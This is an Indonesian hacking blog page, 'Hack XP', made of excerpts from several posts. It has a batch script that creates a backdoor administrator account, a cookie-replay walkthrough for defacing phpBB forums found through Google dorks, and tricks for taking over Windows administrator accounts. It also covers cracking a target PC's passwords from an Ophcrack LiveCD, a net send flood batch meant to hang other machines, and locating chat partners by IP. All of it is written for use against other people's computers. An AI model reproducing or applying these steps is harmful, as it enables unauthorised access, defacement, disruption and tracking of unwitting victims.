Echo Backdoor
rem *echobackd00r.bat
rem *Maret 2004 – backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket 
baca eksploits lokal
rem *MULAI.
@echo off
PROMPT $P$G
cls
Color 87
GOto iklan
:setting
rem *ganti USER dan PASS
set USER=”backdoor”
set PASS=”password”
if %USER%==”backdoor” Goto gagal else GOto proses
:proses
rem *masuk ke perintah tuk nambahin user + passwordnya
net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete
cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat! Continue reading ‘Echo Backdoor’
Defacing
Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Download browser Mozilla FireFox
2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru
3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]
4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader
5. Ingat, isi LiveHTTPHeader harus kosong
6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target
7. setelah halaman sukses terbuka ditandai dengan tanda “done” di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..
8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay…
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
9. Hapus bagian yg belakang setelah tanda semi colon (
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b
\_______________hapus bagian ini_________________/
jadinya akan seperti ini :
Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D Continue reading ‘Defacing’
1. Mau tau username dan password saja :
a. Klik START dan pilih RUN dan ketik CMD terus ENTER
(masuk ke command promt) dan ketik
“net user” (tanpa tanda petik)
tampil deh username yang ada.
2. Hack account adminstrator windows
(catatan : tidak semua sistem windows ada)
a. Sign in sebagau guest/limited account
b. Klik START, RUN dan ketik REGEDIT dan ENTER
c. Buka directory ini :
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon]
d. Cari “”AutoAdminLogon.”, klik kanan dan pilih
MODIFY dan ubah VALUE DATA ke “1″
e. Exit dan restart, langsung deh / otomatis login ke
administrator.
3. Ubah Password Account tanpa PASSWORD LAMA
a. Klik START dan pilih RUN dan ketik CMD terus ENTER
(masuk ke command promt) dan ketik
net users Administrator * (ketik dengan tanda
bintangnya) atau kalau udah tau username nya ketik :
net users “Baba” * (Baba adalah contoh nama username)
b. Terus ada pertanyaan buat password baru, ketik deh
password barunya dan konfirmasikan kembali. Setelah
itu anda gunakan password baru itu buat login. Continue reading ‘Cara Mendapatkan Hak/password Administrator’
Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.
Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.
Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) 
. Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.
Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.
Ok.. langsung aja kita praktek, tapi sebelumnya pasang disclaimer dulu ah… biar bisa ‘lepas’ tanggung jawab kalau tutorial ini disalahgunakan oleh pihak lain 
Disclaimer:
This document was written in the interest of education and care of awareness for unaware people. The author cannot be held responsible for how the topics discussed in this document are applied.
Lets Begin
Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :
Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp Continue reading ‘Hack Windows XP Password dengan Ophcrack’
Mungkin ada yang ingin bertanya, “bagaimana seh caranya flooding ke komputer lain dalam satu network?” dan mungkin akan ada juga pertanyaan “kenapa anda ingin melalukan flooding ke komputer lain dalam 1 network?”.
- Run command prompt/cmd anda, caranya klik start > run > cmd
- Saat command prompt anda muncul, ketik edit hi.bat
- Maka tampilan command prompt anda akan berbeda. setelah itu masukkan/ketikkan code di bawah ini :
net send [ipkomputer]/[namakomputer] hicall hi.batkemudian save as file tersebut.
Saat ingin melakukan flooding, tingal klik 2 kali file batch tersebut…
Ket :
- hi.bat bisa pada langkah 2 bisa diganti dangan nama apa saja, asal tidak spasi dan harus berekstensi .bat dan jangan lupa juga mengganti hi.bat pada code dengan nama yang sama pada langkah 2.
- jika ga tau nama komputer yang terhubung di jaringan, run cmd, lalu ketik “net view” (tanpa tanda petik2) dan juga saat dimasukkan tanpa tanda [ dan ]. Ingat juga, pilih antara ip ato nama komputer.
- cara ini hanya bisa dilakukan jika service messenger pada windows anda dan komputer tujuan di aktifkan
- yang terakhir..!!!! flooding ini akan mengirim pesan “hi” (bisa diganti) berulang-ulang hingga komputer tujuan hang. jadi gunakan dengan bijak.
Sekian…
Kali ini saya akan memberikan sedikit informasi mengenai bagaimana cara seseorang yang ingin mencoba menerobos masuk ke komputer orang lain melalui DOS(Windows XP/2000).Hal yang pertama kita lakukan adalah kita harus tahu dulu alamat IP address/Host Name/Computer name target/korban;
berikut langkah-langkah nya:
1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.
2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.
3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.
Setelah semua nya selesai anda hanya tinggal menambahkan sedikit ramuan mujara/tools tambahan 
Continue reading ‘Cara masuk di komputer lain lewat DOS (Windows XP / 2000)’
Comments
0 comments to "Hack XP"
Posting Komentar